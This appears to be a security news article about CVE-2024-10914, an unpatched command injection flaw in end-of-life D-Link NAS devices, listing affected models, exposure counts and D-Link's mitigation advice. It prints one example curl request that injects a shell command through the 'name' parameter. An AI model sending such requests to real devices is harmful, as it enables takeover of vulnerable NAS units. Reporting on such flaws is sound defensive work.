A critical vulnerability has been discovered in older D-Link NAS devices, affecting over 60,000 units at risk.

398/67 Monday, November 11, 2024

D-Link has issued a warning regarding over 60,000 end-of-life (EoL) network-attached storage (NAS) devices that are being targeted due to a vulnerability that could allow malicious actors to take control of the devices. This vulnerability, identified as CVE-2024-10914, has been given a critical severity rating of 9.2. The flaw stems from insufficient validation of the “name” parameter in the ‘cgi_user_add’ command, enabling unauthenticated attackers to execute arbitrary commands via HTTP GET requests. This vulnerability impacts several popular D-Link NAS models used by small businesses, including:

  • DNS-320 Version 1.00
  • DNS-320LW Version 1.01.0914.2012
  • DNS-325 Version 1.01, Version 1.02
  • DNS-340L Version 1.08

Researchers from Netsecfish have published technical details on this vulnerability, explaining that the attack leverages HTTP GET requests sent to the target NAS devices with embedded malicious shell commands. An example of such a command is:
curl http://[Target-IP]/cgi-bin/account_mgr.cgi cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27
This curl command constructs a URL using the cgi_user_add command with a maliciously injected shell command in the “name” parameter.

Netsecfish’s search on the FOFA platform revealed that over 61,147 vulnerable D-Link devices are connected to 41,097 unique IP addresses. Recently, D-Link confirmed that there will be no security updates to address CVE-2024-10914, as the affected devices have reached the end of their support lifecycle. D-Link advises users to discontinue the use of these affected products. If immediate discontinuation is not possible, users are urged to disconnect the devices from public internet access and restrict access to them.

Additionally, researchers have discovered another vulnerability, CVE-2024-3273, involving unauthorized command injection and embedded backdoors, which impacts most D-Link NAS models similarly to CVE-2024-10914. During that time, FOFA identified 92,589 affected devices. D-Link has confirmed that it has ceased the production of NAS devices, and due to their EoL status, no further security updates will be provided.

Source https://www.bleepingcomputer.com/news/security/d-link-wont-fix-critical-flaw-affecting-60-000-older-nas-devices/